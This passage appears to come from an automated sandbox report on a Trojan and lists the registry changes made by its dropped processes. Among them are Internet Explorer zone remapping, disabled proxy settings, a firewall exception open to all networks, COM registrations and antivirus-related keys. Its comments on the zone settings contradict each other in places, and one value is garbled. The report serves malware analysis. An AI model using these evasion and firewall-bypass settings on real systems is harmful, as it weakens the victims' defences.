"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process xianfengkunbang.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 40 C0 11 D4 F1 F7 8B 5A 07 29 45 1C B6 47 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MM-liao8863.exe:2808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8863.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1437574637"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 2E F4 CB F3 7C 8A 2B C9 CF 9B 62 83 0D C7 05"
[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv088_63.exe" = "9158chat2_ktv088_63"
The Trojan modifies IE security zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process BaiduP2PService.exe:252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB FA 69 4C C0 C7 50 A1 D7 27 0F B2 91 8C 1E AA"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppName" = "BaiduP2PService.exe"
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppPath" = "%Program Files%\tools"
The process BaiduP2PService.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "QQPCDownload71960"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"MM-liao8863.exe" = "DownloadInstall Microsoft 基础类åºâ€Ã§â€Â¨Ã§Â¨â€¹Ã¥ÂºÂ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"install1393485.exe" = "install1393485"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 86 7E 81 D2 97 6E 60 45 C3 D1 35 EA 7E 52 3D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan sets the Internet Explorer security-zone option that maps UNC paths to the Local intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the option that maps sites which bypass the proxy server to the Local intranet zone:
"ProxyBypass" = "1"
The Trojan sets the option that maps local sites not listed in any other zone (host names without dots) to the Local intranet zone:
"IntranetName" = "1"
All three are the default values on Windows XP / IE 6, so by themselves these writes show the process (re)initialising the WinInet zone settings rather than weakening them.
The process xianfeng.exe:272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 11 AE 1D 91 1E 2A 9D 7D DA 54 76 F9 70 26 CE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process RsMgrSvc.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 53 FB AD 0B 3C D3 55 0E E3 15 E6 AA 3D ED 0A"
The process QQPCDownload71960.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D D8 20 E4 30 8C 29 EA ED 91 01 ED 69 00 98 F0"
Adds a Windows Firewall authorized-application entry for the dropped downloader. The value format is path:scope:state:description; the scope * means all networks, so the program may accept inbound connections from any address. (The real value name is the executable's full path; the sandbox has split it at the last backslash, so the directory appears as part of the key below.)
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe:*:Enabled:Tencent Download Program"
The process regsvr32.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 6F 6F 82 35 2B E6 B4 42 4C C9 1E F6 D5 B3 F6"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
The process regsvr32.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 27 00 09 3B BD 71 E4 0F BB D9 70 13 B6 83 45"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"
[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"
[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"
[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
The process regsvr32.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 47 06 DB 24 F6 FB 0E AB 15 D2 57 42 3D E2 D3"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
The process regsvr32.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 F0 F9 DF 51 78 58 28 95 D9 6D 0E 0B C2 39 DE"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
The process install1393485.exe:1148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1478494857"
[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"rstrayexe" = "gWx0Lv5HQEgHSwg0HF4LXHw="
"RAV" = "gWx0Lv5HYHol0A=="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"InstallPath" = "gWx0Lv5HF2shdi4fc3Y3cDtobmkaSgAjVWcheD8D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1446872457"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"Title" = "gWx0Lv5H-suj/tn/-pC71NWzoQ=="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
